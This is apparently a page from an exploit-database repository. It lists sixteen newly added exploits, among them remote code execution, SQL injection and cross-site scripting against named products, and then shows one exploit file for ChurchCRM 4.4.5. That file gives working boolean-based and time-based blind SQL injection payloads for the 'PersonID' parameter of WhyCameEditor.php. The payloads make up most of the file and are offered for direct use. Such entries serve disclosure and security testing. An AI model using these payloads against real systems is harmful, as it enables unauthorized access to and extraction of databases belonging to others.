
16 changes to exploits/shellcodes Real Player v.20.0.8.310 G2 Control - 'DoGoToURL()' Remote Code Execution (RCE) Real Player 16.0.3.51 - 'external::Import()' Directory Traversal to Remote Code Execution (RCE) HP LaserJet Professional M1210 MFP Series Receive Fax Service - Unquoted Service Path Marval MSM v14.19.0.12476 - Remote Code Execution (RCE) (Authenticated) Virtua Software Cobranca 12S - SQLi Marval MSM v14.19.0.12476 - Cross-Site Request Forgery (CSRF) Algo 8028 Control Panel - Remote Code Execution (RCE) (Authenticated) TP-Link Router AX50 firmware 210730 - Remote Code Execution (RCE) (Authenticated) Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE) Avantune Genialcloud ProJ 10 - Cross-Site Scripting (XSS) Pandora FMS v7.0NG.742 - Remote Code Execution (RCE) (Authenticated) phpIPAM 1.4.5 - Remote Code Execution (RCE) (Authenticated) ChurchCRM 4.4.5 - SQLi Old Age Home Management System 1.0 - SQLi Authentication Bypass SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting (XSS) SolarView Compact 6.00 - 'pow' Cross-Site Scripting (XSS)
27 lines
No EOL
853 B
Text
27 lines
No EOL
853 B
Text
# Exploit Title: ChurchCRM 4.4.5 - SQLi
|
|
# Exploit Author: nu11secur1ty
|
|
# Date: 05.11.2022
|
|
# Vendor: https://churchcrm.io/
|
|
# Software: https://github.com/ChurchCRM/CRM
|
|
# Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-31325
|
|
|
|
## Description:
|
|
There is a SQL Injection vulnerability in ChurchCRM 4.4.5 via the 'PersonID' field in /churchcrm/WhyCameEditor.php.
|
|
|
|
[+] Payloads:
|
|
|
|
```mysql
|
|
---
|
|
Parameter: PersonID (GET)
|
|
Type: boolean-based blind
|
|
Title: Boolean-based blind - Parameter replace (original value)
|
|
Payload: PersonID=(SELECT (CASE WHEN (6445=6445) THEN 1 ELSE
|
|
(SELECT 2844 UNION SELECT 1058) END))&WhyCameID=1&linkBack=
|
|
|
|
Type: time-based blind
|
|
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
|
Payload: PersonID=1 AND (SELECT 7116 FROM
|
|
(SELECT(SLEEP(5)))xUOx)&WhyCameID=1&linkBack=
|
|
---
|
|
|
|
``` |